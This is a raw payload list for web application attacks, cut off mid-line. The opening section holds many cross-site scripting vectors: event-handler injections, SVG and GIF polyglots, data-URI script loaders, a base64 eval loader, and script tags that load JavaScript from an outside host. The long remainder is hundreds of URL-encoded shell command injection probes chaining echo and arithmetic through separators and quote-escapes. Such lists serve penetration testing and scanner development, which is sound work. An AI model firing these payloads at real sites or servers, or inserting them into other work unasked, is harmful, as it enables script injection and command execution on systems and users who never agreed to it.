xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>\n<html ontouchstart=alert(1)> \n<html ontouchend=alert(1)> \n<html ontouchmove=alert(1)> \n<html ontouchcancel=alert(1)>\n<body onorientationchange=alert(1)>\n\"><img src=1 onerror=alert(1)>.gif\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\nGIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;\n<script src=\"data:&comma;alert(1)//\n\"><script src=data:&comma;alert(1)//\n<script src=\"//brutelogic.com.br&sol;1.js&num; \n\"><script src=//brutelogic.com.br&sol;1.js&num; \n<link rel=import href=\"data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; \n\"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;\n<base href=//0>\n<script/src=\"data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)\n<body onload=alert(1)>\n<body onpageshow=alert(1)>\n<body onfocus=alert(1)>\n<body onhashchange=alert(1)><a href=#x>click this!#x\n<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x\n<body onscroll=alert(1)><br><br><br><br>\n<br><br><br><br><br><br><br><br><br><br>\n<br><br><br><br><br><br><br><br><br><br>\n<br><br><br><br><br><br><x id=x>#x\n<body onresize=alert(1)>press F12!\n<body onhelp=alert(1)>press F1! (MSIE)\n<marquee onstart=alert(1)>\n<marquee loop=1 width=0 onfinish=alert(1)>\n<audio src onloadstart=alert(1)>\n<video onloadstart=alert(1)><source>\n<input autofocus onblur=alert(1)>\n<keygen autofocus onfocus=alert(1)>\n<form onsubmit=alert(1)><input type=submit>\n<select onchange=alert(1)><option>1<option>2\n<menu id=x contextmenu=x onshow=alert(1)>right click me!\necho%20AGIYMZ$((69%2B52))$(echo%20AGIYMZ)AGIYMZ\n%20echo%20TDJHRY$((30%2B41))$(echo%20TDJHRY)TDJHRY\n;echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG\n&echo%20NWMZCF$((57%2B72))$(echo%20NWMZCF)NWMZCF\n|echo%20TJEGSE$((27%2B57))$(echo%20TJEGSE)TJEGSE\n||echo%20ANSBHE$((26%2B89))$(echo%20ANSBHE)ANSBHE\n&&echo%20PVJXOS$((12%2B1))$(echo%20PVJXOS)PVJXOS\n%0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ\n%3Becho%20SRPJET$((29%2B34))$(echo%20SRPJET)SRPJET\n%26echo%20NQPWBV$((16%2B77))$(echo%20NQPWBV)NQPWBV\n%26%26echo%20QOZRFB$((19%2B4))$(echo%20QOZRFB)QOZRFB\n%7Cecho%20IRODNG$((26%2B68))$(echo%20IRODNG)IRODNG\n%7C%7Cecho%20KRCSNE$((57%2B75))$(echo%20KRCSNE)KRCSNE\necho%20IFNPXI$((40%2B99))$(echo%20IFNPXI)IFNPXI'\n%20echo%20HBFEEM$((46%2B2))$(echo%20HBFEEM)HBFEEM'\n;echo%20KHMFRS$((69%2B67))$(echo%20KHMFRS)KHMFRS'\n&echo%20DACXMN$((57%2B35))$(echo%20DACXMN)DACXMN'\n|echo%20DDLJJW$((33%2B23))$(echo%20DDLJJW)DDLJJW'\n||echo%20XIYAUA$((17%2B90))$(echo%20XIYAUA)XIYAUA'\n&&echo%20CMMOTV$((30%2B10))$(echo%20CMMOTV)CMMOTV'\n%0aecho%20VKWHEH$((83%2B36))$(echo%20VKWHEH)VKWHEH'\n%3Becho%20RDKWWC$((22%2B44))$(echo%20RDKWWC)RDKWWC'\n%26echo%20VOANQN$((77%2B86))$(echo%20VOANQN)VOANQN'\n%26%26echo%20EXUMZL$((4%2B99))$(echo%20EXUMZL)EXUMZL'\n%7Cecho%20VDZSYZ$((58%2B1))$(echo%20VDZSYZ)VDZSYZ'\n%7C%7Cecho%20HYHREQ$((78%2B11))$(echo%20HYHREQ)HYHREQ'\necho%20GHWFXG$((12%2B72))$(echo%20GHWFXG)GHWFXG\"\n%20echo%20BAJXZZ$((73%2B7))$(echo%20BAJXZZ)BAJXZZ\"\n;echo%20YRBNTY$((83%2B14))$(echo%20YRBNTY)YRBNTY\"\n&echo%20WQLTXV$((0%2B25))$(echo%20WQLTXV)WQLTXV\"\n|echo%20PRCGGO$((57%2B79))$(echo%20PRCGGO)PRCGGO\"\n||echo%20RWZHCR$((74%2B28))$(echo%20RWZHCR)RWZHCR\"\n&&echo%20QTDSQL$((20%2B35))$(echo%20QTDSQL)QTDSQL\"\n%0aecho%20NCRQQT$((66%2B95))$(echo%20NCRQQT)NCRQQT\"\n%3Becho%20QXBWJP$((56%2B78))$(echo%20QXBWJP)QXBWJP\"\n%26echo%20YYWLTQ$((61%2B71))$(echo%20YYWLTQ)YYWLTQ\"\n%26%26echo%20XKFEGJ$((1%2B49))$(echo%20XKFEGJ)XKFEGJ\"\n%7Cecho%20YPOSVR$((24%2B62))$(echo%20YPOSVR)YPOSVR\"\n%7C%7Cecho%20CFGBVN$((38%2B88))$(echo%20CFGBVN)CFGBVN\"\necho%20CWRXRJ$((77%2B13))$(echo%20CWRXRJ)CWRXRJ\n%20echo%20IBQHOS$((92%2B76))$(echo%20IBQHOS)IBQHOS\n;echo%20CSPAAF$((48%2B26))$(echo%20CSPAAF)CSPAAF\n&echo%20DRUCFI$((69%2B56))$(echo%20DRUCFI)DRUCFI\n|echo%20TWNZDU$((10%2B40))$(echo%20TWNZDU)TWNZDU\n||echo%20TPIMPW$((11%2B13))$(echo%20TPIMPW)TPIMPW\n&&echo%20FOJNEL$((64%2B8))$(echo%20FOJNEL)FOJNEL\n%0aecho%20MBVQWK$((48%2B90))$(echo%20MBVQWK)MBVQWK\n%3Becho%20RHJGKQ$((38%2B71))$(echo%20RHJGKQ)RHJGKQ\n%26echo%20MUQJWT$((7%2B78))$(echo%20MUQJWT)MUQJWT\n%26%26echo%20KHAVOV$((90%2B77))$(echo%20KHAVOV)KHAVOV\n%7Cecho%20SUHDBU$((66%2B15))$(echo%20SUHDBU)SUHDBU\n%7C%7Cecho%20FEGCUU$((21%2B29))$(echo%20FEGCUU)FEGCUU\necho%20DINEVC$((57%2B17))$(echo%20DINEVC)DINEVC//\n%20echo%20BSYIFX$((64%2B71))$(echo%20BSYIFX)BSYIFX//\n;echo%20FRDAGY$((96%2B63))$(echo%20FRDAGY)FRDAGY//\n&echo%20QLUITC$((73%2B99))$(echo%20QLUITC)QLUITC//\n|echo%20SBZVBA$((97%2B74))$(echo%20SBZVBA)SBZVBA//\n||echo%20ZZJQZV$((83%2B59))$(echo%20ZZJQZV)ZZJQZV//\n&&echo%20RIWFAA$((64%2B99))$(echo%20RIWFAA)RIWFAA//\n%0aecho%20MESJOF$((62%2B27))$(echo%20MESJOF)MESJOF//\n%3Becho%20SVKHMK$((30%2B19))$(echo%20SVKHMK)SVKHMK//\n%26echo%20ZPAVCI$((24%2B53))$(echo%20ZPAVCI)ZPAVCI//\n%26%26echo%20MXMWUR$((62%2B86))$(echo%20MXMWUR)MXMWUR//\n%7Cecho%20AGUYET$((89%2B40))$(echo%20AGUYET)AGUYET//\n%7C%7Cecho%20SBQJMU$((91%2B44))$(echo%20SBQJMU)SBQJMU//\necho%20ZUXLTJ$((16%2B69))$(echo%20ZUXLTJ)ZUXLTJ\\\n%20echo%20QQZCOQ$((29%2B94))$(echo%20QQZCOQ)QQZCOQ\\\n;echo%20KHCYPO$((77%2B38))$(echo%20KHCYPO)KHCYPO\\\n&echo%20MCEEEZ$((59%2B2))$(echo%20MCEEEZ)MCEEEZ\\\n|echo%20OYDZIJ$((96%2B61))$(echo%20OYDZIJ)OYDZIJ\\\n||echo%20PJBTDO$((60%2B74))$(echo%20PJBTDO)PJBTDO\\\n&&echo%20HETHMD$((47%2B99))$(echo%20HETHMD)HETHMD\\\n%0aecho%20HNNUGD$((25%2B95))$(echo%20HNNUGD)HNNUGD\\\n%3Becho%20OFIKGO$((60%2B50))$(echo%20OFIKGO)OFIKGO\\\n%26echo%20RKCZIL$((79%2B92))$(echo%20RKCZIL)RKCZIL\\\n%26%26echo%20WLJUON$((15%2B95))$(echo%20WLJUON)WLJUON\\\n%7Cecho%20WEBPND$((27%2B55))$(echo%20WEBPND)WEBPND\\\n%7C%7Cecho%20HKTMWP$((40%2B9))$(echo%20HKTMWP)HKTMWP\\\necho%20MTEZNM$((22%2B3))$(echo%20MTEZNM)MTEZNM&\n%20echo%20YPQTYX$((9%2B27))$(echo%20YPQTYX)YPQTYX&\n;echo%20UNXFGJ$((26%2B60))$(echo%20UNXFGJ)UNXFGJ&\n&echo%20KUCRVN$((73%2B39))$(echo%20KUCRVN)KUCRVN&\n|echo%20FNYPPK$((77%2B83))$(echo%20FNYPPK)FNYPPK&\n||echo%20NRVZFD$((41%2B1))$(echo%20NRVZFD)NRVZFD&\n&&echo%20QAGWEJ$((84%2B54))$(echo%20QAGWEJ)QAGWEJ&\n%0aecho%20HNTZSH$((50%2B30))$(echo%20HNTZSH)HNTZSH&\n%3Becho%20HGVPJY$((28%2B49))$(echo%20HGVPJY)HGVPJY&\n%26echo%20FWAUTF$((39%2B22))$(echo%20FWAUTF)FWAUTF&\n%26%26echo%20BSQKBM$((74%2B49))$(echo%20BSQKBM)BSQKBM&\n%7Cecho%20SEIDBX$((80%2B51))$(echo%20SEIDBX)SEIDBX&\n%7C%7Cecho%20TVKSTF$((99%2B96))$(echo%20TVKSTF)TVKSTF&\necho%20XOEUCM$((23%2B30))$(echo%20XOEUCM)XOEUCM|\n%20echo%20DRFYNB$((7%2B97))$(echo%20DRFYNB)DRFYNB|\n;echo%20SIRYMP$((7%2B6))$(echo%20SIRYMP)SIRYMP|\n&echo%20SPRAWO$((58%2B5))$(echo%20SPRAWO)SPRAWO|\n|echo%20OTDJOE$((4%2B21))$(echo%20OTDJOE)OTDJOE|\n||echo%20RFRIIL$((68%2B10))$(echo%20RFRIIL)RFRIIL|\n&&echo%20GKEMGA$((51%2B90))$(echo%20GKEMGA)GKEMGA|\n%0aecho%20ZNOLCP$((67%2B83))$(echo%20ZNOLCP)ZNOLCP|\n%3Becho%20PSHEAA$((43%2B12))$(echo%20PSHEAA)PSHEAA|\n%26echo%20YPFSZA$((90%2B71))$(echo%20YPFSZA)YPFSZA|\n%26%26echo%20BHDDGG$((67%2B94))$(echo%20BHDDGG)BHDDGG|\n%7Cecho%20UFFOUX$((59%2B47))$(echo%20UFFOUX)UFFOUX|\n%7C%7Cecho%20CXXXGW$((34%2B53))$(echo%20CXXXGW)CXXXGW|\necho%20URJEMH$((2%2B45))$(echo%20URJEMH)URJEMH%27\n%20echo%20ALRHIH$((11%2B27))$(echo%20ALRHIH)ALRHIH%27\n;echo%20IPTSZG$((46%2B17))$(echo%20IPTSZG)IPTSZG%27\n&echo%20YHCAGI$((22%2B26))$(echo%20YHCAGI)YHCAGI%27\n|echo%20DZPIWA$((18%2B47))$(echo%20DZPIWA)DZPIWA%27\n||echo%20SJZFWV$((8%2B68))$(echo%20SJZFWV)SJZFWV%27\n&&echo%20QZXLOK$((2%2B27))$(echo%20QZXLOK)QZXLOK%27\n%0aecho%20URBCMK$((17%2B54))$(echo%20URBCMK)URBCMK%27\n%3Becho%20QHDGWH$((99%2B66))$(echo%20QHDGWH)QHDGWH%27\n%26echo%20WOTYOT$((32%2B39))$(echo%20WOTYOT)WOTYOT%27\n%26%26echo%20CSSQPT$((9%2B40))$(echo%20CSSQPT)CSSQPT%27\n%7Cecho%20CPQTYB$((64%2B20))$(echo%20CPQTYB)CPQTYB%27\n%7C%7Cecho%20EBGHXU$((74%2B4))$(echo%20EBGHXU)EBGHXU%27\necho%20LENNLE$((14%2B89))$(echo%20LENNLE)LENNLE%22\n%20echo%20FPVLKT$((63%2B87))$(echo%20FPVLKT)FPVLKT%22\n;echo%20OIHFAC$((90%2B34))$(echo%20OIHFAC)OIHFAC%22\n&echo%20QLFUON$((35%2B62))$(echo%20QLFUON)QLFUON%22\n|echo%20GEPPDW$((55%2B58))$(echo%20GEPPDW)GEPPDW%22\n||echo%20DETQCQ$((28%2B83))$(echo%20DETQCQ)DETQCQ%22\n&&echo%20BALAGY$((97%2B95))$(echo%20BALAGY)BALAGY%22\n%0aecho%20PETUUK$((81%2B85))$(echo%20PETUUK)PETUUK%22\n%3Becho%20LBKHXK$((90%2B74))$(echo%20LBKHXK)LBKHXK%22\n%26echo%20JOADAU$((32%2B46))$(echo%20JOADAU)JOADAU%22\n%26%26echo%20DNDLZD$((92%2B6))$(echo%20DNDLZD)DNDLZD%22\n%7Cecho%20ORHNZL$((45%2B63))$(echo%20ORHNZL)ORHNZL%22\n%7C%7Cecho%20TEDJVC$((96%2B45))$(echo%20TEDJVC)TEDJVC%22\necho%20AQRKLL$((20%2B31))$(echo%20AQRKLL)AQRKLL%5C%5C\n%20echo%20CKFAYE$((18%2B45))$(echo%20CKFAYE)CKFAYE%5C%5C\n;echo%20HYBMMW$((16%2B36))$(echo%20HYBMMW)HYBMMW%5C%5C\n&echo%20NOKSUR$((8%2B35))$(echo%20NOKSUR)NOKSUR%5C%5C\n|echo%20OTDXSU$((6%2B1))$(echo%20OTDXSU)OTDXSU%5C%5C\n||echo%20KFLFGL$((10%2B4))$(echo%20KFLFGL)KFLFGL%5C%5C\n&&echo%20MKGYYL$((46%2B31))$(echo%20MKGYYL)MKGYYL%5C%5C\n%0aecho%20ANSTBN$((20%2B35))$(echo%20ANSTBN)ANSTBN%5C%5C\n%3Becho%20OHYLGW$((56%2B18))$(echo%20OHYLGW)OHYLGW%5C%5C\n%26echo%20NFGINK$((64%2B92))$(echo%20NFGINK)NFGINK%5C%5C\n%26%26echo%20EJACRB$((30%2B66))$(echo%20EJACRB)EJACRB%5C%5C\n%7Cecho%20QNJYVT$((4%2B44))$(echo%20QNJYVT)QNJYVT%5C%5C\n%7C%7Cecho%20UBHYQD$((55%2B41))$(echo%20UBHYQD)UBHYQD%5C%5C\necho%20TJAXUJ$((80%2B70))$(echo%20TJAXUJ)TJAXUJ%2F%2F\n%20echo%20RGMCLI$((27%2B75))$(echo%20RGMCLI)RGMCLI%2F%2F\n;echo%20KUXGTM$((7%2B89))$(echo%20KUXGTM)KUXGTM%2F%2F\n&echo%20CCYVIF$((50%2B63))$(echo%20CCYVIF)CCYVIF%2F%2F\n|echo%20GRWCHE$((81%2B54))$(echo%20GRWCHE)GRWCHE%2F%2F\n||echo%20OZJGZU$((76%2B56))$(echo%20OZJGZU)OZJGZU%2F%2F\n&&echo%20RLCXAD$((4%2B93))$(echo%20RLCXAD)RLCXAD%2F%2F\n%0aecho%20KYMBVZ$((7%2B62))$(echo%20KYMBVZ)KYMBVZ%2F%2F\n%3Becho%20SVFHGU$((48%2B4))$(echo%20SVFHGU)SVFHGU%2F%2F\n%26echo%20OXZPGU$((40%2B61))$(echo%20OXZPGU)OXZPGU%2F%2F\n%26%26echo%20PUUCTR$((68%2B33))$(echo%20PUUCTR)PUUCTR%2F%2F\n%7Cecho%20CGYJPN$((45%2B35))$(echo%20CGYJPN)CGYJPN%2F%2F\n%7C%7Cecho%20XVNYDY$((93%2B18))$(echo%20XVNYDY)XVNYDY%2F%2F\necho%20ZZAYTQ$((30%2B82))$(echo%20ZZAYTQ)ZZAYTQ%26\n%20echo%20TWTKKJ$((67%2B81))$(echo%20TWTKKJ)TWTKKJ%26\n;echo%20DDXENF$((29%2B82))$(echo%20DDXENF)DDXENF%26\n&echo%20JFDHZU$((1%2B12))$(echo%20JFDHZU)JFDHZU%26\n|echo%20PAKNUK$((48%2B25))$(echo%20PAKNUK)PAKNUK%26\n||echo%20IHELYG$((76%2B62))$(echo%20IHELYG)IHELYG%26\n&&echo%20LOAKXY$((52%2B22))$(echo%20LOAKXY)LOAKXY%26\n%0aecho%20JXLHHG$((94%2B73))$(echo%20JXLHHG)JXLHHG%26\n%3Becho%20FAHQNN$((39%2B84))$(echo%20FAHQNN)FAHQNN%26\n%26echo%20RDICIX$((99%2B44))$(echo%20RDICIX)RDICIX%26\n%26%26echo%20ZTWRSM$((30%2B32))$(echo%20ZTWRSM)ZTWRSM%26\n%7Cecho%20LLYIHD$((46%2B68))$(echo%20LLYIHD)LLYIHD%26\n%7C%7Cecho%20OYGMVZ$((16%2B56))$(echo%20OYGMVZ)OYGMVZ%26\necho%20LZWGVJ$((6%2B60))$(echo%20LZWGVJ)LZWGVJ%7C\n%20echo%20YEOGLL$((28%2B5))$(echo%20YEOGLL)YEOGLL%7C\n;echo%20MXKHVK$((46%2B71))$(echo%20MXKHVK)MXKHVK%7C\n&echo%20OSJJGL$((20%2B68))$(echo%20OSJJGL)OSJJGL%7C\n|echo%20FZLTEJ$((27%2B72))$(echo%20FZLTEJ)FZLTEJ%7C\n||echo%20ZLPJPQ$((81%2B32))$(echo%20ZLPJPQ)ZLPJPQ%7C\n&&echo%20KXTSXC$((16%2B52))$(echo%20KXTSXC)KXTSXC%7C\n%0aecho%20QUHONN$((15%2B27))$(echo%20QUHONN)QUHONN%7C\n%3Becho%20YORHEJ$((41%2B36))$(echo%20YORHEJ)YORHEJ%7C\n%26echo%20MHEMLM$((72%2B41))$(echo%20MHEMLM)MHEMLM%7C\n%26%26echo%20FFQWQY$((35%2B58))$(echo%20FFQWQY)FFQWQY%7C\n%7Cecho%20DPZHUT$((28%2B81))$(echo%20DPZHUT)DPZHUT%7C\n%7C%7Cecho%20FFBSEF$((15%2B13))$(echo%20FFBSEF)FFBSEF%7C\n'echo%20OKVFZD$((59%2B78))$(echo%20OKVFZD)OKVFZD\n'%20echo%20KSLOZF$((6%2B29))$(echo%20KSLOZF)KSLOZF\n';echo%20PWKXHB$((27%2B16))$(echo%20PWKXHB)PWKXHB\n'&echo%20EBREVB$((48%2B67))$(echo%20EBREVB)EBREVB\n'|echo%20TRMWWT$((44%2B53))$(echo%20TRMWWT)TRMWWT\n'||echo%20JQACJR$((33%2B35))$(echo%20JQACJR)JQACJR\n'&&echo%20ZJEXPP$((7%2B99))$(echo%20ZJEXPP)ZJEXPP\n'%0aecho%20ICLECP$((72%2B88))$(echo%20ICLECP)ICLECP\n'%3Becho%20VUJCMW$((70%2B75))$(echo%20VUJCMW)VUJCMW\n'%26echo%20JPCWXJ$((42%2B48))$(echo%20JPCWXJ)JPCWXJ\n'%26%26echo%20ATQDYD$((66%2B7))$(echo%20ATQDYD)ATQDYD\n'%7Cecho%20LPCJMS$((42%2B26))$(echo%20LPCJMS)LPCJMS\n'%7C%7Cecho%20PROWNM$((55%2B15))$(echo%20PROWNM)PROWNM\n'echo%20VKYYJY$((60%2B15))$(echo%20VKYYJY)VKYYJY'\n'%20echo%20CFTYMJ$((83%2B12))$(echo%20CFTYMJ)CFTYMJ'\n';echo%20NUCRTG$((61%2B63))$(echo%20NUCRTG)NUCRTG'\n'&echo%20COKQPG$((93%2B87))$(echo%20COKQPG)COKQPG'\n'|echo%20VQUOCA$((12%2B35))$(echo%20VQUOCA)VQUOCA'\n'||echo%20QPBCIU$((74%2B42))$(echo%20QPBCIU)QPBCIU'\n'&&echo%20TWQKFP$((48%2B69))$(echo%20TWQKFP)TWQKFP'\n'%0aecho%20BTIFJC$((66%2B80))$(echo%20BTIFJC)BTIFJC'\n'%3Becho%20URYBVY$((71%2B95))$(echo%20URYBVY)URYBVY'\n'%26echo%20SDBGBI$((27%2B20))$(echo%20SDBGBI)SDBGBI'\n'%26%26echo%20CMXOJB$((29%2B98))$(echo%20CMXOJB)CMXOJB'\n'%7Cecho%20CFOPSJ$((27%2B97))$(echo%20CFOPSJ)CFOPSJ'\n'%7C%7Cecho%20YHTZHZ$((60%2B82))$(echo%20YHTZHZ)YHTZHZ'\n'echo%20DYFBHG$((50%2B7))$(echo%20DYFBHG)DYFBHG\"\n'%20echo%20JADUEG$((82%2B93))$(echo%20JADUEG)JADUEG\"\n';echo%20PYWYEX$((88%2B85))$(echo%20PYWYEX)PYWYEX\"\n'&echo%20AGXFEH$((96%2B88))$(echo%20AGXFEH)AGXFEH\"\n'|echo%20CKJBUZ$((1%2B22))$(echo%20CKJBUZ)CKJBUZ\"\n'||echo%20GPBEGV$((20%2B34))$(echo%20GPBEGV)GPBEGV\"\n'&&echo%20BSQSGI$((11%2B44))$(echo%20BSQSGI)BSQSGI\"\n'%0aecho%20SZLYQY$((17%2B3))$(echo%20SZLYQY)SZLYQY\"\n'%3Becho%20MAQCNL$((34%2B31))$(echo%20MAQCNL)MAQCNL\"\n'%26echo%20YBINSK$((62%2B49))$(echo%20YBINSK)YBINSK\"\n'%26%26echo%20YBQKFD$((48%2B31))$(echo%20YBQKFD)YBQKFD\"\n'%7Cecho%20UJMTRL$((89%2B70))$(echo%20UJMTRL)UJMTRL\"\n'%7C%7Cecho%20QSKTXK$((24%2B37))$(echo%20QSKTXK)QSKTXK\"\n'echo%20KOOMPK$((13%2B41))$(echo%20KOOMPK)KOOMPK\n'%20echo%20MJNNEW$((18%2B53))$(echo%20MJNNEW)MJNNEW\n';echo%20HTPOKC$((39%2B32))$(echo%20HTPOKC)HTPOKC\n'&echo%20CLYXGN$((72%2B81))$(echo%20CLYXGN)CLYXGN\n'|echo%20CTNHMN$((74%2B58))$(echo%20CTNHMN)CTNHMN\n'||echo%20TOWNYH$((45%2B79))$(echo%20TOWNYH)TOWNYH\n'&&echo%20KYOISY$((63%2B3))$(echo%20KYOISY)KYOISY\n'%0aecho%20EIOCXK$((27%2B80))$(echo%20EIOCXK)EIOCXK\n'%3Becho%20LMKOMS$((85%2B51))$(echo%20LMKOMS)LMKOMS\n'%26echo%20XIZQEH$((78%2B28))$(echo%20XIZQEH)XIZQEH\n'%26%26echo%20AKFLIE$((27%2B64))$(echo%20AKFLIE)AKFLIE\n'%7Cecho%20TOTSLG$((60%2B1))$(echo%20TOTSLG)TOTSLG\n'%7C%7Cecho%20DVAMSG$((74%2B5))$(echo%20DVAMSG)DVAMSG\n'echo%20GGRVQX$((86%2B56))$(echo%20GGRVQX)GGRVQX//\n'%20echo%20WWHRDZ$((5%2B86))$(echo%20WWHRDZ)WWHRDZ//\n';echo%20YDSNXZ$((29%2B43))$(echo%20YDSNXZ)YDSNXZ//\n'&echo%20BRXZKX$((10%2B84))$(echo%20BRXZKX)BRXZKX//\n'|echo%20ZMCCDQ$((18%2B56))$(echo%20ZMCCDQ)ZMCCDQ//\n'||echo%20XNZLSA$((34%2B75))$(echo%20XNZLSA)XNZLSA//\n'&&echo%20SKRKXO$((18%2B5))$(echo%20SKRKXO)SKRKXO//\n'%0aecho%20WIRUWF$((87%2B88))$(echo%20WIRUWF)WIRUWF//\n'%3Becho%20LIHHVF$((18%2B45))$(echo%20LIHHVF)LIHHVF//\n'%26echo%20VDQUYJ$((41%2B46))$(echo%20VDQUYJ)VDQUYJ//\n'%26%26echo%20EKWZHX$((96%2B4))$(echo%20EKWZHX)EKWZHX//\n'%7Cecho%20LLJKNH$((3%2B88))$(echo%20LLJKNH)LLJKNH//\n'%7C%7Cecho%20CNSLVN$((6%2B10))$(echo%20CNSLVN)CNSLVN//\n'echo%20UVXCGD$((51%2B43))$(echo%20UVXCGD)UVXCGD\\\n'%20echo%20BYBKHF$((87%2B41))$(echo%20BYBKHF)BYBKHF\\\n';echo%20ACEKKI$((66%2B70))$(echo%20ACEKKI)ACEKKI\\\n'&echo%20WHEUEX$((35%2B4))$(echo%20WHEUEX)WHEUEX\\\n'|echo%20LTTDYL$((1%2B42))$(echo%20LTTDYL)LTTDYL\\\n'||echo%20VAYJRW$((6%2B1))$(echo%20VAYJRW)VAYJRW\\\n'&&echo%20WZZOUT$((83%2B36))$(echo%20WZZOUT)WZZOUT\\\n'%0aecho%20BMHVJK$((19%2B30))$(echo%20BMHVJK)BMHVJK\\\n'%3Becho%20HQBNCX$((10%2B83))$(echo%20HQBNCX)HQBNCX\\\n'%26echo%20BRROSL$((24%2B11))$(echo%20BRROSL)BRROSL\\\n'%26%26echo%20IKUKJX$((80%2B89))$(echo%20IKUKJX)IKUKJX\\\n'%7Cecho%20KAJAPA$((75%2B48))$(echo%20KAJAPA)KAJAPA\\\n'%7C%7Cecho%20JJSSJL$((99%2B38))$(echo%20JJSSJL)JJSSJL\\\n'echo%20QQEHPP$((69%2B2))$(echo%20QQEHPP)QQEHPP&\n'%20echo%20JFTFZW$((33%2B39))$(echo%20JFTFZW)JFTFZW&\n';echo%20PYZNPF$((23%2B64))$(echo%20PYZNPF)PYZNPF&\n'&echo%20XYOEXK$((74%2B11))$(echo%20XYOEXK)XYOEXK&\n'|echo%20YCIXVI$((40%2B81))$(echo%20YCIXVI)YCIXVI&\n'||echo%20GERZZX$((98%2B84))$(echo%20GERZZX)GERZZX&\n'&&echo%20HVTWDK$((44%2B47))$(echo%20HVTWDK)HVTWDK&\n'%0aecho%20MGXPRT$((51%2B4))$(echo%20MGXPRT)MGXPRT&\n'%3Becho%20UFYCCQ$((51%2B2))$(echo%20UFYCCQ)UFYCCQ&\n'%26echo%20JUIBAU$((1%2B74))$(echo%20JUIBAU)JUIBAU&\n'%26%26echo%20BMIIJQ$((29%2B3))$(echo%20BMIIJQ)BMIIJQ&\n'%7Cecho%20ZPVFOX$((81%2B22))$(echo%20ZPVFOX)ZPVFOX&\n'%7C%7Cecho%20SLVMKV$((96%2B0))$(echo%20SLVMKV)SLVMKV&\n'echo%20HBTLLE$((1%2B32))$(echo%20HBTLLE)HBTLLE|\n'%20echo%20HNOLCQ$((85%2B27))$(echo%20HNOLCQ)HNOLCQ|\n';echo%20CCXTNP$((57%2B74))$(echo%20CCXTNP)CCXTNP|\n'&echo%20ELYXQO$((59%2B10))$(echo%20ELYXQO)ELYXQO|\n'|echo%20NUZDZT$((76%2B71))$(echo%20NUZDZT)NUZDZT|\n'||echo%20LAPJJF$((87%2B11))$(echo%20LAPJJF)LAPJJF|\n'&&echo%20TWKYHE$((0%2B57))$(echo%20TWKYHE)TWKYHE|\n'%0aecho%20MAOXEM$((48%2B53))$(echo%20MAOXEM)MAOXEM|\n'%3Becho%20QGKSLY$((79%2B94))$(echo%20QGKSLY)QGKSLY|\n'%26echo%20UCANNA$((30%2B68))$(echo%20UCANNA)UCANNA|\n'%26%26echo%20ZWVYHU$((11%2B21))$(echo%20ZWVYHU)ZWVYHU|\n'%7Cecho%20DPUJIL$((23%2B45))$(echo%20DPUJIL)DPUJIL|\n'%7C%7Cecho%20BHFQIY$((13%2B3))$(echo%20BHFQIY)BHFQIY|\n'echo%20ZKEZHZ$((79%2B67))$(echo%20ZKEZHZ)ZKEZHZ%27\n'%20echo%20DCFSTX$((93%2B73))$(echo%20DCFSTX)DCFSTX%27\n';echo%20HPSGQK$((19%2B98))$(echo%20HPSGQK)HPSGQK%27\n'&echo%20LTTPNV$((10%2B90))$(echo%20LTTPNV)LTTPNV%27\n'|echo%20RAKMKS$((5%2B89))$(echo%20RAKMKS)RAKMKS%27\n'||echo%20SGXVWY$((48%2B78))$(echo%20SGXVWY)SGXVWY%27\n'&&echo%20XOCEJG$((66%2B21))$(echo%20XOCEJG)XOCEJG%27\n'%0aecho%20PPSKOS$((66%2B51))$(echo%20PPSKOS)PPSKOS%27\n'%3Becho%20HKYEGB$((78%2B19))$(echo%20HKYEGB)HKYEGB%27\n'%26echo%20YRIYND$((40%2B81))$(echo%20YRIYND)YRIYND%27\n'%26%26echo%20SWZBKK$((94%2B84))$(echo%20SWZBKK)SWZBKK%27\n'%7Cecho%20KIELDL$((12%2B2))$(echo%20KIELDL)KIELDL%27\n'%7C%7Cecho%20AXSULH$((48%2B60))$(echo%20AXSULH)AXSULH%27\n'echo%20WIBNDS$((23%2B85))$(echo%20WIBNDS)WIBNDS%22\n'%20echo%20HBUFGZ$((85%2B26))$(echo%20HBUFGZ)HBUFGZ%22\n';echo%20RHFTCS$((28%2B7))$(echo%20RHFTCS)RHFTCS%22\n'&echo%20RJCCAT$((53%2B34))$(echo%20RJCCAT)RJCCAT%22\n'|echo%20UTCPPJ$((1%2B15))$(echo%20UTCPPJ)UTCPPJ%22\n'||echo%20DNOHYC$((47%2B59))$(echo%20DNOHYC)DNOHYC%22\n'&&echo%20SXUJKT$((94%2B38))$(echo%20SXUJKT)SXUJKT%22\n'%0aecho%20GGGPWE$((90%2B87))$(echo%20GGGPWE)GGGPWE%22\n'%3Becho%20WIJQLD$((58%2B39))$(echo%20WIJQLD)WIJQLD%22\n'%26echo%20PXNVTZ$((92%2B1))$(echo%20PXNVTZ)PXNVTZ%22\n'%26%26echo%20DDHYJG$((44%2B11))$(echo%20DDHYJG)DDHYJG%22\n'%7Cecho%20WUSBMH$((6%2B46))$(echo%20WUSBMH)WUSBMH%22\n'%7C%7Cecho%20ZJAXER$((49%2B60))$(echo%20ZJAXER)ZJAXER%22\n'echo%20GZXGVN$((4%2B70))$(echo%20GZXGVN)GZXGVN%5C%5C\n'%20echo%20UXKTUC$((59%2B25))$(echo%20UXKTUC)UXKTUC%5C%5C\n';echo%20KKGOUA$((23%2B96))$(echo%20KKGOUA)KKGOUA%5C%5C\n'&echo%20QFGFEP$((28%2B72))$(echo%20QFGFEP)QFGFEP%5C%5C\n'|echo%20LRGWPW$((14%2B39))$(echo%20LRGWPW)LRGWPW%5C%5C\n'||echo%20ANRNDB$((81%2B57))$(echo%20ANRNDB)ANRNDB%5C%5C\n'&&echo%20XWGNWJ$((33%2B16))$(echo%20XWGNWJ)XWGNWJ%5C%5C\n'%0aecho%20IMHMUF$((78%2B85))$(echo%20IMHMUF)IMHMUF%5C%5C\n'%3Becho%20JPRQKB$((93%2B89))$(echo%20JPRQKB)JPRQKB%5C%5C\n'%26echo%20NKMKNI$((64%2B82))$(echo%20NKMKNI)NKMKNI%5C%5C\n'%26%26echo%